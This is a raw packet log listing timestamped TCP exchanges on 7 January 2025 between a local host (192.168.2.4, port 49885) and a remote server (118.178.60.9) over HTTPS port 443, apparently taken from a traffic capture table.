Jan 7, 2025 04:22:40.382962942 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.382996082 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.383002043 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.383023024 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.383045912 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.383181095 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.383259058 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.383323908 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.383409977 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.401334047 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.401405096 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.401489973 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.401532888 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.410100937 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.410135031 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.410156012 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.410167933 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.410178900 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.410594940 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.412825108 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.412853003 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.412882090 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.412889004 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.412915945 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.412938118 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.420197964 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.420254946 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.420341015 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.420387030 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.425412893 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.425442934 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.425471067 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.425477982 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.425491095 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.425715923 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.433547974 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.433609009 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.433617115 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.433670044 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.441745043 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.441816092 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.441890001 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.441936970 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.447273970 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.447331905 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.447421074 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.447463989 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.451653957 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.451702118 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.451873064 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.451921940 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.454061031 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.454104900 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.454118013 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.454160929 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.459583044 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.459630966 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.459680080 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.459733009 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.464293957 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.464339972 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.464406967 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.464447975 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.467528105 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.467588902 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.675328970 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.675389051 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:40.883330107 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:40.885735989 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.120831013 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.120843887 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120855093 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120904922 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.120909929 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120933056 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.120935917 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120944977 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120966911 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.120970964 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.120987892 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121011972 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121017933 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121036053 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121042013 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121062040 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121098995 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121104956 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121145964 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121150970 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121198893 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121205091 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121244907 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121249914 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121285915 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121341944 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.121351004 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.121393919 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.331337929 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.331553936 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.664514065 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.664532900 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.664598942 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742506027 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742518902 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742527962 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742614031 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742614031 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742620945 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742629051 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742634058 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742830992 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742835999 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742845058 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742855072 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742954969 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742954969 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.742959976 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742969990 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742985964 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.742997885 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.743072033 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.743077993 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.743118048 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.743125916 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.743200064 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.743200064 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:41.951322079 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:41.951422930 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.367337942 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.369770050 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.589713097 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.589735031 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.589824915 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.589824915 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610496998 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610502958 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610511065 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610652924 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610656977 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610667944 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610833883 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610836983 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610846043 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610856056 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610960007 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610960007 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.610965014 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610975981 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610994101 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.610997915 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.611089945 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.611093044 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.611202955 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.611202955 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.611222982 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.611429930 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.793672085 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.793689013 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.793759108 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.822447062 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.822452068 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822472095 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822484016 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822506905 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822679043 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.822685003 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822772980 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.822845936 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:42.822853088 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:42.822925091 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.027327061 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.027400970 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.111454010 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.111473083 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.111536026 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149627924 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149640083 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149653912 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149663925 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149708033 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149710894 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149720907 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149760008 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149765015 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149775028 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149815083 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149818897 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149842978 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149857998 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149861097 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149874926 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.149986029 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.149991035 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.150017977 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.150022030 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.150130033 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.355334044 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.357737064 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446316957 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446331024 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446348906 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446365118 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446516991 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446525097 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446542978 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446559906 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446583033 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446583033 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446588039 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.446727037 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.446805954 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.651328087 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.653851032 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.808645964 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.808660984 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.808681011 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.808846951 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.851744890 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.851753950 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.851771116 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.851775885 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.852006912 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.852020979 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.852041960 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.852066040 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.852070093 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:43.852201939 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:43.852252960 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.059336901 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.061753035 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.184518099 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.184535027 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.184555054 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.184673071 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.231226921 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.231245041 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231265068 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231273890 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231375933 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.231384039 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231400013 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231475115 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.231478930 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.231549025 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.231595039 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.443332911 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.443383932 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.581043005 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.581054926 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.581070900 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.581185102 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.630038977 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.630045891 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630062103 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630065918 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630209923 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.630215883 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630225897 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630249023 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.630253077 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.630300999 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.630377054 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:44.839338064 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:44.839391947 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.024348974 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.024362087 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.024377108 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.024533987 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.078469038 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.078475952 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078493118 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078495979 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078691006 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.078696966 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078710079 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078725100 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.078815937 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.078829050 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.078915119 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.283335924 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.283384085 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.507467985 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.507479906 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.507493973 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.507561922 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.507612944 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.566504002 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.566518068 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.566539049 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.566704035 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.566709042 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.566735983 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.566754103 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.566842079 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.566940069 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.566962957 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:45.775336027 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:45.775408983 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.006561995 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.006575108 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.006591082 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.006601095 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.006691933 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.071224928 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.071229935 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071274042 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071286917 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071438074 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.071443081 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071454048 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071470976 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.071567059 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.071599960 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.071645021 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.283340931 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.283394098 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.578671932 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.578685045 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.578697920 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.578708887 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.578768015 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.578824997 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.642492056 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.642505884 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642523050 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642534971 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642657042 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.642663956 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642673016 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642689943 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.642774105 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.642774105 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.642838001 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:46.851334095 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:46.853754997 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:47.138648987 CET	49885	443	192.168.2.4	118.178.60.9
Jan 7, 2025 04:22:47.138662100 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:47.138674974 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:47.138685942 CET	443	49885	118.178.60.9	192.168.2.4
Jan 7, 2025 04:22:47.138767004 CET	49885	443	192.168.2.4	118.178.60.9
